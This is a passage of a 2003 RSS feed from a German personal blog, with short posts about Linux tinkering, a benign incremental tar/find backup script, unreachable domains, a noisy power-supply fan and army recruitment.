  12794.    <content:encoded><![CDATA[Wenn bei einer Option für einen Befehl '(DANGEROUS)' steht, sollte auch der liebenswerte und neugierige Herr Jaggi ein bisschen Vernunft erhaschen und zuerst denken, dann handeln, denn sonst kommt es so, dass er die Festplatte auf UDMA-5 stellt, was nicht funktionieren kann, und dann seine ganze $HOME-Partition (und auch noch ein paar andere) zerlöchert!<br><br>Natürlich liegt das letzte Backup (Ja, ich bin ein FEigling ;-) schon über 2 Wochen zurück und  nützt auch nicht wirklich viel!
  12795. ]]></content:encoded>
  12796.  </item>
  12797.  
  12798.  <item>
  12799.    <title>sec ist zurück</title>
  12800.    <link>https://blog.x-way.org/Misc/2003/02/21/sec_ist_zurueck.html</link>
  12801.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=277</guid>
  12802.    <dc:creator>Andreas Jaggi</dc:creator>
  12803.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12804.    <pubDate>Fri, 21 Feb 2003 15:17:00 +0000</pubDate>
  12805.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12806.    <description><![CDATA[<a href="http://sec.digigeek.net/"><b>da!</b></a>
  12807. ]]></description>
  12808.    <content:encoded><![CDATA[<a href="http://sec.digigeek.net/"><b>da!</b></a>
  12809. ]]></content:encoded>
  12810.  </item>
  12811.  
  12812.  <item>
  12813.    <title>noch zu Zensur</title>
  12814.    <link>https://blog.x-way.org/Networking/2003/02/21/noch_zu_Zensur.html</link>
  12815.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=276</guid>
  12816.    <dc:creator>Andreas Jaggi</dc:creator>
  12817.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12818.    <pubDate>Fri, 21 Feb 2003 02:57:00 +0000</pubDate>
  12819.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  12820.    <description><![CDATA[E-Mail Abrufen etc. geht natürlich auch nicht, da die Domain mail.waterwave.ch laut Mozilla gar nicht existiert. und ein 'ping waterwave.ch' ergibt nur 'ping: unknown host waterwave.ch' :-(<br><br>Warum, Warum, WWAAARRUUUMM ???
  12821. ]]></description>
  12822.    <content:encoded><![CDATA[E-Mail Abrufen etc. geht natürlich auch nicht, da die Domain mail.waterwave.ch laut Mozilla gar nicht existiert. und ein 'ping waterwave.ch' ergibt nur 'ping: unknown host waterwave.ch' :-(<br><br>Warum, Warum, WWAAARRUUUMM ???
  12823. ]]></content:encoded>
  12824.  </item>
  12825.  
  12826.  <item>
  12827.    <title>Zensur?</title>
  12828.    <link>https://blog.x-way.org/Networking/2003/02/21/Zensur.html</link>
  12829.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=275</guid>
  12830.    <dc:creator>Andreas Jaggi</dc:creator>
  12831.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12832.    <pubDate>Fri, 21 Feb 2003 02:40:00 +0000</pubDate>
  12833.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  12834.    <description><![CDATA[Ich kann <a href="http://waterwave.ch"><b>waterwave.ch</b></a> und jegliche Domains die darauf umgeleitet werden von zu Hause aus nicht mehr erreichen! Auch andere Domains (<a href="#" class="gone"><b>sunflyer.ch</b></a>, <a href="http://www.ubique.ch"><b>ubique.ch</b></a>) kann ich nicht erreichen, resp. kann mein PC nicht finden!<br><br>Wenn ich jedoch mit einem 'Anonymisierer' (<a href="https://web.archive.org/web/20030220101506/http://nonymouse.com/"><b>nonymouse.com</b></a>) darauf zugreife, funktioniert alles problemlos (z.B. dieses Posting).<br><br>Kann mir bitte jemand (möglichst viele *g*) mitteilen, ob die genannten Domains auch bei anderen Leuten nicht erreichbar sind. Ich vermute nämlich, dass <a href="http://solnet.ch"><b>Solnet</b></a> irgend einem richterlichen Befehl folgt und das Internet nur <b><span style="font-size: larger">zensiert</span></b> ausliefert! Frage mich nur, was die obgenannten Domains so böses angestellt haben, damit sie versteckt werden müssen...
  12835. ]]></description>
  12836.    <content:encoded><![CDATA[Ich kann <a href="http://waterwave.ch"><b>waterwave.ch</b></a> und jegliche Domains die darauf umgeleitet werden von zu Hause aus nicht mehr erreichen! Auch andere Domains (<a href="#" class="gone"><b>sunflyer.ch</b></a>, <a href="http://www.ubique.ch"><b>ubique.ch</b></a>) kann ich nicht erreichen, resp. kann mein PC nicht finden!<br><br>Wenn ich jedoch mit einem 'Anonymisierer' (<a href="https://web.archive.org/web/20030220101506/http://nonymouse.com/"><b>nonymouse.com</b></a>) darauf zugreife, funktioniert alles problemlos (z.B. dieses Posting).<br><br>Kann mir bitte jemand (möglichst viele *g*) mitteilen, ob die genannten Domains auch bei anderen Leuten nicht erreichbar sind. Ich vermute nämlich, dass <a href="http://solnet.ch"><b>Solnet</b></a> irgend einem richterlichen Befehl folgt und das Internet nur <b><span style="font-size: larger">zensiert</span></b> ausliefert! Frage mich nur, was die obgenannten Domains so böses angestellt haben, damit sie versteckt werden müssen...
  12837. ]]></content:encoded>
  12838.  </item>
  12839.  
  12840.  <item>
  12841.    <title>Armee</title>
  12842.    <link>https://blog.x-way.org/Misc/2003/02/20/Armee.html</link>
  12843.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=274</guid>
  12844.    <dc:creator>Andreas Jaggi</dc:creator>
  12845.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12846.    <pubDate>Thu, 20 Feb 2003 11:05:00 +0000</pubDate>
  12847.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12848.    <description><![CDATA[So siehts aus:<br><a href="https://blog.x-way.org/images/armee.gif"><img src="https://blog.x-way.org/images/armee_s.gif" width="100" height="70" alt="Auszug ausm Dienstbüchlein"></a>
  12849. ]]></description>
  12850.    <content:encoded><![CDATA[So siehts aus:<br><a href="https://blog.x-way.org/images/armee.gif"><img src="https://blog.x-way.org/images/armee_s.gif" width="100" height="70" alt="Auszug ausm Dienstbüchlein"></a>
  12851. ]]></content:encoded>
  12852.  </item>
  12853.  
  12854.  <item>
  12855.    <title>Rekrutierung</title>
  12856.    <link>https://blog.x-way.org/Misc/2003/02/18/Rekrutierung.html</link>
  12857.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=273</guid>
  12858.    <dc:creator>Andreas Jaggi</dc:creator>
  12859.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12860.    <pubDate>Tue, 18 Feb 2003 17:58:00 +0000</pubDate>
  12861.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12862.    <description><![CDATA[Nun schreibe ich mit einer voll scheisse Steinzeit-Tastatur. Und die Internetzeit läuft gleich ab. Hab gerade 2 Psychotests in Rekordzeit absolviert ;-)
  12863. ]]></description>
  12864.    <content:encoded><![CDATA[Nun schreibe ich mit einer voll scheisse Steinzeit-Tastatur. Und die Internetzeit läuft gleich ab. Hab gerade 2 Psychotests in Rekordzeit absolviert ;-)
  12865. ]]></content:encoded>
  12866.  </item>
  12867.  
  12868.  <item>
  12869.    <title>Netzteil-Tweaking ?</title>
  12870.    <link>https://blog.x-way.org/Tech/2003/02/16/Netzteil-Tweaking_.html</link>
  12871.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=272</guid>
  12872.    <dc:creator>Andreas Jaggi</dc:creator>
  12873.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12874.    <pubDate>Sun, 16 Feb 2003 11:24:00 +0000</pubDate>
  12875.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  12876.    <description><![CDATA[Nachdem ich letzte Woche infolge angehäufer Proben, kaum Zeit hatte, den Computer einzuschalten, hat er sich gestern gerächt!<br><br>Mein Netzteil het nun irgendein Problem mit dem Temperatursensor. Kaum habe ich den Computer eingeschaltet und Linux gestartet, so beginnt der temperaturgesteuerte Netzteillüfter auf höchster Drehzahl zu laufen, was einen SEHR lauten Lärm verursacht!<br><br>Ich hab mich mal ein bisschen umgeschaut und <a href="https://web.archive.org/web/20030202015231/http://www.teccentral.de/artikel/artikel_144_s1.html"><b>diesen Review</b></a> gefunden, indem auch der Temperatursensor thematisiert wird. In den <a href="https://web.archive.org/web/20030204022726/http://www.teccentral.de/artikel/kommentare.php?op=SK&amp;artikel_id=144"><b>Kommentaren</b></a> wird gesagt, dass man problemlos einen Widerstand einbauen kann, der die Empfindlichkeit des Sensors dämpft.<br><br>Nun brauche ich noch nen Widerstand mit  1.5 Watt / 68 Ohm. Da ich sowieso nächste Woche noch Elektrizitätslehre repetieren muss, wird das wohl ne schöne praxisnahe Übung ;-)<br><br>Und Falls ich nächste Woche hier nichts mehr schreibe, so hab ich entweder falsch rumgebastelt, oder die von der Armee haben mich bei der Aushebung irgendwie malträtiert ;-)
  12877. ]]></description>
  12878.    <content:encoded><![CDATA[Nachdem ich letzte Woche infolge angehäufer Proben, kaum Zeit hatte, den Computer einzuschalten, hat er sich gestern gerächt!<br><br>Mein Netzteil het nun irgendein Problem mit dem Temperatursensor. Kaum habe ich den Computer eingeschaltet und Linux gestartet, so beginnt der temperaturgesteuerte Netzteillüfter auf höchster Drehzahl zu laufen, was einen SEHR lauten Lärm verursacht!<br><br>Ich hab mich mal ein bisschen umgeschaut und <a href="https://web.archive.org/web/20030202015231/http://www.teccentral.de/artikel/artikel_144_s1.html"><b>diesen Review</b></a> gefunden, indem auch der Temperatursensor thematisiert wird. In den <a href="https://web.archive.org/web/20030204022726/http://www.teccentral.de/artikel/kommentare.php?op=SK&amp;artikel_id=144"><b>Kommentaren</b></a> wird gesagt, dass man problemlos einen Widerstand einbauen kann, der die Empfindlichkeit des Sensors dämpft.<br><br>Nun brauche ich noch nen Widerstand mit  1.5 Watt / 68 Ohm. Da ich sowieso nächste Woche noch Elektrizitätslehre repetieren muss, wird das wohl ne schöne praxisnahe Übung ;-)<br><br>Und Falls ich nächste Woche hier nichts mehr schreibe, so hab ich entweder falsch rumgebastelt, oder die von der Armee haben mich bei der Aushebung irgendwie malträtiert ;-)
  12879. ]]></content:encoded>
  12880.  </item>
  12881.  
  12882.  <item>
  12883.    <title>Yeehaw!</title>
  12884.    <link>https://blog.x-way.org/Linux/2003/02/09/Yeehaw.html</link>
  12885.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=271</guid>
  12886.    <dc:creator>Andreas Jaggi</dc:creator>
  12887.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12888.    <pubDate>Sun, 09 Feb 2003 01:36:00 +0000</pubDate>
  12889.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12890.    <description><![CDATA[<img src="https://blog.x-way.org/images/15+.png" width="240" height="161" alt="Altersbeschränkung von UT2003"><br><br>Dies ist die aufs UT2003 aufgedruckte Altersbeschränkung, aber um die gehts in diesem Eintrag gar nicht, denn um diese Alterbeschränkung hier zeigen zu können, musste ich sie zuerst scannen und darum gehts.<br>Beim rumsurfen bin ich auf <a href="https://web.archive.org/web/20030407235802/http://www.pl-berichte.de/t_hardware/hp-psc.html"><b>dieses Tutorial</b></a> von <a href="http://pro-linux.de/"><b>Pro-Linux.de</b></a> gestossen. Da ich einen HP PSC 950 Drucker, Scanner, Fax, Kopierer, Media-Card-Reader besitze, und ich zuerst annahm, dass der garnicht mit Linux zusammenarbeitet, war ich schon sehr glücklich, als ich den Drucker zum Laufen brachte. Von dem Tutorial angeregt, hab ich mich nocheinmal dahintergesetzt und nach langem und sehr intensivem Basteln (Drucker in CUPS entfernen, CUPS stoppen, HPOJS installieren, PPD File neu generieren, HPOJS Starten, HPOJS Konfigurieren, CUPS Starten, Drucker in CUPS wieder einrichten, schauen ob was erkennt wird, Scanner ja, Drucker nein (??), nocheinmal (und noch viele male mehr) alles von vorne ... ) geschafft, dass ich nun auch unter Linux Scannen kann, den Beweis seht ihr ja. <br>So, mal schauen ob wir den eingebauten Media-Card-Reader auch noch zum Leben erwecken können ...
  12891. ]]></description>
  12892.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/15+.png" width="240" height="161" alt="Altersbeschränkung von UT2003"><br><br>Dies ist die aufs UT2003 aufgedruckte Altersbeschränkung, aber um die gehts in diesem Eintrag gar nicht, denn um diese Alterbeschränkung hier zeigen zu können, musste ich sie zuerst scannen und darum gehts.<br>Beim rumsurfen bin ich auf <a href="https://web.archive.org/web/20030407235802/http://www.pl-berichte.de/t_hardware/hp-psc.html"><b>dieses Tutorial</b></a> von <a href="http://pro-linux.de/"><b>Pro-Linux.de</b></a> gestossen. Da ich einen HP PSC 950 Drucker, Scanner, Fax, Kopierer, Media-Card-Reader besitze, und ich zuerst annahm, dass der garnicht mit Linux zusammenarbeitet, war ich schon sehr glücklich, als ich den Drucker zum Laufen brachte. Von dem Tutorial angeregt, hab ich mich nocheinmal dahintergesetzt und nach langem und sehr intensivem Basteln (Drucker in CUPS entfernen, CUPS stoppen, HPOJS installieren, PPD File neu generieren, HPOJS Starten, HPOJS Konfigurieren, CUPS Starten, Drucker in CUPS wieder einrichten, schauen ob was erkennt wird, Scanner ja, Drucker nein (??), nocheinmal (und noch viele male mehr) alles von vorne ... ) geschafft, dass ich nun auch unter Linux Scannen kann, den Beweis seht ihr ja. <br>So, mal schauen ob wir den eingebauten Media-Card-Reader auch noch zum Leben erwecken können ...
  12893. ]]></content:encoded>
  12894.  </item>
  12895.  
  12896.  <item>
  12897.    <title>Das fehlt thinkgeek.com</title>
  12898.    <link>https://blog.x-way.org/Misc/2003/02/08/Das_fehlt_thinkgeekcom.html</link>
  12899.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=270</guid>
  12900.    <dc:creator>Andreas Jaggi</dc:creator>
  12901.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12902.    <pubDate>Sat, 08 Feb 2003 20:19:00 +0000</pubDate>
  12903.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12904.    <description><![CDATA[<img src="https://blog.x-way.org/images/tshirt_sex.jpg" width="200" height="260" alt="Will fix your Computer for sex"><br><br>Gefunden bei <a href="https://web.archive.org/web/20030602203153/http://unix-girl.com/blog/"><b>Kasia</b></a>.
  12905. ]]></description>
  12906.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/tshirt_sex.jpg" width="200" height="260" alt="Will fix your Computer for sex"><br><br>Gefunden bei <a href="https://web.archive.org/web/20030602203153/http://unix-girl.com/blog/"><b>Kasia</b></a>.
  12907. ]]></content:encoded>
  12908.  </item>
  12909.  
  12910.  <item>
  12911.    <title>GSM-Handys schädigen Nervenzellen</title>
  12912.    <link>https://blog.x-way.org/Misc/2003/02/07/GSM-Handys_schaedigen_Nervenzellen.html</link>
  12913.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=269</guid>
  12914.    <dc:creator>Andreas Jaggi</dc:creator>
  12915.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12916.    <pubDate>Fri, 07 Feb 2003 16:45:00 +0000</pubDate>
  12917.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12918.    <description><![CDATA[Ich habs ja schon immer gesagt. <a href="http://heise.de/newsticker/data/pmz-06.02.03-002/"><b>Selber schauen.</b></a>
  12919. ]]></description>
  12920.    <content:encoded><![CDATA[Ich habs ja schon immer gesagt. <a href="http://heise.de/newsticker/data/pmz-06.02.03-002/"><b>Selber schauen.</b></a>
  12921. ]]></content:encoded>
  12922.  </item>
  12923.  
  12924.  <item>
  12925.    <title>zeugs</title>
  12926.    <link>https://blog.x-way.org/Linux/2003/02/06/zeugs.html</link>
  12927.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=268</guid>
  12928.    <dc:creator>Andreas Jaggi</dc:creator>
  12929.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12930.    <pubDate>Thu, 06 Feb 2003 18:51:00 +0000</pubDate>
  12931.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12932.    <description><![CDATA[<a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>rw</b></a> hat wiedereinmal ein paar nützliche tutorials aufgestöbert/geschrieben:<br>- <a href="https://web.archive.org/web/20030211085525/https://www.floppymoose.com/"><b>Better Ad Blocking for Mozilla and Netscape 7</b></a><br>- <a href="http://www.pro-linux.de/news/2002/0088.html"><b>RPM- und TGZ-Paket erzeugen mit Checkinstall</b></a><br>- <a href="https://web.archive.org/web/20030413013755/http://www.robwei.de/texte/gnupg-qnd.html"><b>GnuPG - Quick 'n' dirty</b></a>
  12933. ]]></description>
  12934.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20060715140732/http://rw.fuq-u.org/"><b>rw</b></a> hat wiedereinmal ein paar nützliche tutorials aufgestöbert/geschrieben:<br>- <a href="https://web.archive.org/web/20030211085525/https://www.floppymoose.com/"><b>Better Ad Blocking for Mozilla and Netscape 7</b></a><br>- <a href="http://www.pro-linux.de/news/2002/0088.html"><b>RPM- und TGZ-Paket erzeugen mit Checkinstall</b></a><br>- <a href="https://web.archive.org/web/20030413013755/http://www.robwei.de/texte/gnupg-qnd.html"><b>GnuPG - Quick 'n' dirty</b></a>
  12935. ]]></content:encoded>
  12936.  </item>
  12937.  
  12938.  <item>
  12939.    <title>*gähn*</title>
  12940.    <link>https://blog.x-way.org/Misc/2003/02/03/gaehn.html</link>
  12941.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=267</guid>
  12942.    <dc:creator>Andreas Jaggi</dc:creator>
  12943.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12944.    <pubDate>Mon, 03 Feb 2003 02:22:00 +0000</pubDate>
  12945.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12946.    <description><![CDATA[so jetzt ist 2:22:22 und ich geh jetzt schlafen ;-)
  12947. ]]></description>
  12948.    <content:encoded><![CDATA[so jetzt ist 2:22:22 und ich geh jetzt schlafen ;-)
  12949. ]]></content:encoded>
  12950.  </item>
  12951.  
  12952.  <item>
  12953.    <title>Wein</title>
  12954.    <link>https://blog.x-way.org/Linux/2003/02/03/Wein.html</link>
  12955.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=266</guid>
  12956.    <dc:creator>Andreas Jaggi</dc:creator>
  12957.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12958.    <pubDate>Mon, 03 Feb 2003 01:24:00 +0000</pubDate>
  12959.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12960.    <description><![CDATA[Mit <a href="http://www.winehq.com/"><b>Wine</b></a> kann man so lustige Sachen wie <a href="https://blog.x-way.org/images/pinball.jpg"><b>diese</b></a> machen.<br>So, noch ein bisschen basteln, vielleicht krieg ich ja Fireworks so zum laufen :-)
  12961. ]]></description>
  12962.    <content:encoded><![CDATA[Mit <a href="http://www.winehq.com/"><b>Wine</b></a> kann man so lustige Sachen wie <a href="https://blog.x-way.org/images/pinball.jpg"><b>diese</b></a> machen.<br>So, noch ein bisschen basteln, vielleicht krieg ich ja Fireworks so zum laufen :-)
  12963. ]]></content:encoded>
  12964.  </item>
  12965.  
  12966.  <item>
  12967.    <title>Zuerst das Vergnügen dann nix mehr ;-)</title>
  12968.    <link>https://blog.x-way.org/Linux/2003/02/02/Zuerst_das_Vergnuegen_dann_nix_mehr_-.html</link>
  12969.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=265</guid>
  12970.    <dc:creator>Andreas Jaggi</dc:creator>
  12971.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12972.    <pubDate>Sun, 02 Feb 2003 01:11:00 +0000</pubDate>
  12973.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12974.    <description><![CDATA[Nebst UT und UT2003 läuft jetzt auch Quake3A :-)
  12975. ]]></description>
  12976.    <content:encoded><![CDATA[Nebst UT und UT2003 läuft jetzt auch Quake3A :-)
  12977. ]]></content:encoded>
  12978.  </item>
  12979.  
  12980.  <item>
  12981.    <title>Backup, besser</title>
  12982.    <link>https://blog.x-way.org/Linux/2003/02/01/Backup_besser.html</link>
  12983.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=264</guid>
  12984.    <dc:creator>Andreas Jaggi</dc:creator>
  12985.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12986.    <pubDate>Sat, 01 Feb 2003 16:10:00 +0000</pubDate>
  12987.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  12988.    <description><![CDATA[Leider kommt das gepostete Script nicht mit Ordnernamen, die mit Spaces vermurkst sind (ja genau, von Windows), zurecht. Wenn man nun zuerst die Ergebnisse von find ... in eine Datei speichert (mit -fprint Datei) und diese dann dem tar ... übergibt (mit --files-from=Datei) funktionierts! Evtl. muss man noch mittels --exclude=Datei diese Hilfsdatei vorm tar verstecken ;-)
  12989. ]]></description>
  12990.    <content:encoded><![CDATA[Leider kommt das gepostete Script nicht mit Ordnernamen, die mit Spaces vermurkst sind (ja genau, von Windows), zurecht. Wenn man nun zuerst die Ergebnisse von find ... in eine Datei speichert (mit -fprint Datei) und diese dann dem tar ... übergibt (mit --files-from=Datei) funktionierts! Evtl. muss man noch mittels --exclude=Datei diese Hilfsdatei vorm tar verstecken ;-)
  12991. ]]></content:encoded>
  12992.  </item>
  12993.  
  12994.  <item>
  12995.    <title>Backup</title>
  12996.    <link>https://blog.x-way.org/Linux/2003/02/01/Backup.html</link>
  12997.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=263</guid>
  12998.    <dc:creator>Andreas Jaggi</dc:creator>
  12999.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13000.    <pubDate>Sat, 01 Feb 2003 03:05:00 +0000</pubDate>
  13001.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13002.    <description><![CDATA[Ich hab mich mal ein bisschen mit inkrementellem Backup beschäftigt. Rausgekommen ist das hier, vielleicht kanns ja sonst noch jemand gebrauchen.<pre>today=`date +%d%b%Y`
  13003. backup_path=/backup
  13004. tar -cvf $backup_path/backup_$today.tar `find /home /www /root -newer $backup_path ! -name *~ ! -type d -print` > $backup_path/backup_$today.toc</pre>
  13005. Dieses Shellscript macht ein tar-file mit den Dateien aus /home, /www und /root, die seit dem letzten Backup verändert wurden und legt dieses unter /backup ab inklusive einer Inhaltsangabe :-)
  13006. ]]></description>
  13007.    <content:encoded><![CDATA[Ich hab mich mal ein bisschen mit inkrementellem Backup beschäftigt. Rausgekommen ist das hier, vielleicht kanns ja sonst noch jemand gebrauchen.<pre>today=`date +%d%b%Y`
  13008. backup_path=/backup
  13009. tar -cvf $backup_path/backup_$today.tar `find /home /www /root -newer $backup_path ! -name *~ ! -type d -print` > $backup_path/backup_$today.toc</pre>
  13010. Dieses Shellscript macht ein tar-file mit den Dateien aus /home, /www und /root, die seit dem letzten Backup verändert wurden und legt dieses unter /backup ab inklusive einer Inhaltsangabe :-)
  13011. ]]></content:encoded>
  13012.  </item>
  13013.  
  13014.  <item>
  13015.    <title>Die Aussicht geniessen</title>
  13016.    <link>https://blog.x-way.org/Misc/2003/01/31/Die_Aussicht_geniessen.html</link>
  13017.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=262</guid>
  13018.    <dc:creator>Andreas Jaggi</dc:creator>
  13019.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13020.    <pubDate>Fri, 31 Jan 2003 03:25:00 +0000</pubDate>
  13021.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13022.    <description><![CDATA[<a href="https://blog.x-way.org/images/Shot00002.png"><img src="https://blog.x-way.org/images/Shot00002_s.png" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a><a href="https://blog.x-way.org/images/Shot00003.png"><img src="https://blog.x-way.org/images/Shot00003_s.png" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a>
  13023. ]]></description>
  13024.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/Shot00002.png"><img src="https://blog.x-way.org/images/Shot00002_s.png" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a><a href="https://blog.x-way.org/images/Shot00003.png"><img src="https://blog.x-way.org/images/Shot00003_s.png" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a>
  13025. ]]></content:encoded>
  13026.  </item>
  13027.  
  13028.  <item>
  13029.    <title>UT-ig</title>
  13030.    <link>https://blog.x-way.org/Linux/2003/01/29/UT-ig.html</link>
  13031.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=261</guid>
  13032.    <dc:creator>Andreas Jaggi</dc:creator>
  13033.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13034.    <pubDate>Wed, 29 Jan 2003 15:36:00 +0000</pubDate>
  13035.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13036.    <description><![CDATA[Jetzt läuft nebst UT auch UT2003 mit Gentoo :-)<br>Screenshots und Framerates gibts (noch) nicht ;-P
  13037. ]]></description>
  13038.    <content:encoded><![CDATA[Jetzt läuft nebst UT auch UT2003 mit Gentoo :-)<br>Screenshots und Framerates gibts (noch) nicht ;-P
  13039. ]]></content:encoded>
  13040.  </item>
  13041.  
  13042.  <item>
  13043.    <title>Laaaaaaaaaaaag !!!</title>
  13044.    <link>https://blog.x-way.org/Networking/2003/01/27/Laaaaaaaaaaaag_.html</link>
  13045.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=260</guid>
  13046.    <dc:creator>Andreas Jaggi</dc:creator>
  13047.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13048.    <pubDate>Mon, 27 Jan 2003 22:05:00 +0000</pubDate>
  13049.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  13050.    <description><![CDATA[würde es an einer LAN heissen.<br>Das Internet lahmt momentan teilweise wie Sau und es liegt vermutlich <a href="http://heise.de/newsticker/data/pab-27.01.03-000/"><b>daran</b></a>, da ich nicht wie <a href="http://schockwellenreiter.de/"><b>andere</b></a> mit T-Dings ins Netz gehe *hehe*
  13051. ]]></description>
  13052.    <content:encoded><![CDATA[würde es an einer LAN heissen.<br>Das Internet lahmt momentan teilweise wie Sau und es liegt vermutlich <a href="http://heise.de/newsticker/data/pab-27.01.03-000/"><b>daran</b></a>, da ich nicht wie <a href="http://schockwellenreiter.de/"><b>andere</b></a> mit T-Dings ins Netz gehe *hehe*
  13053. ]]></content:encoded>
  13054.  </item>
  13055.  
  13056.  <item>
  13057.    <title>Hammer</title>
  13058.    <link>https://blog.x-way.org/Tech/2003/01/27/Hammer.html</link>
  13059.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=259</guid>
  13060.    <dc:creator>Andreas Jaggi</dc:creator>
  13061.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13062.    <pubDate>Mon, 27 Jan 2003 21:45:00 +0000</pubDate>
  13063.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  13064.    <description><![CDATA[Ich glaub ich werd mir den Hammer kaufen *g*
  13065. ]]></description>
  13066.    <content:encoded><![CDATA[Ich glaub ich werd mir den Hammer kaufen *g*
  13067. ]]></content:encoded>
  13068.  </item>
  13069.  
  13070.  <item>
  13071.    <title>Still alive</title>
  13072.    <link>https://blog.x-way.org/Misc/2003/01/27/Still_alive.html</link>
  13073.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=258</guid>
  13074.    <dc:creator>Andreas Jaggi</dc:creator>
  13075.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13076.    <pubDate>Mon, 27 Jan 2003 21:44:00 +0000</pubDate>
  13077.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13078.    <description><![CDATA[So, nach dem Begiessen des Notenschlusses (22.1.) und anderen Feierlichkeiten, machten wir heute eine Betreibsbesichtigung bei der Firma <a href="http://moog.ch/"><b>Moog</b></a>, welche laut Michael S. (dessen Grossvater dat die Firma gegründet) die besten Hochdruckreiniger der Welt herstellt.
  13079. ]]></description>
  13080.    <content:encoded><![CDATA[So, nach dem Begiessen des Notenschlusses (22.1.) und anderen Feierlichkeiten, machten wir heute eine Betreibsbesichtigung bei der Firma <a href="http://moog.ch/"><b>Moog</b></a>, welche laut Michael S. (dessen Grossvater dat die Firma gegründet) die besten Hochdruckreiniger der Welt herstellt.
  13081. ]]></content:encoded>
  13082.  </item>
  13083.  
  13084.  <item>
  13085.    <title>waimea</title>
  13086.    <link>https://blog.x-way.org/Linux/2003/01/21/waimea.html</link>
  13087.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=257</guid>
  13088.    <dc:creator>Andreas Jaggi</dc:creator>
  13089.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13090.    <pubDate>Tue, 21 Jan 2003 20:30:00 +0000</pubDate>
  13091.    <category domain="https://blog.x-way.org/Linux">Linux</category>
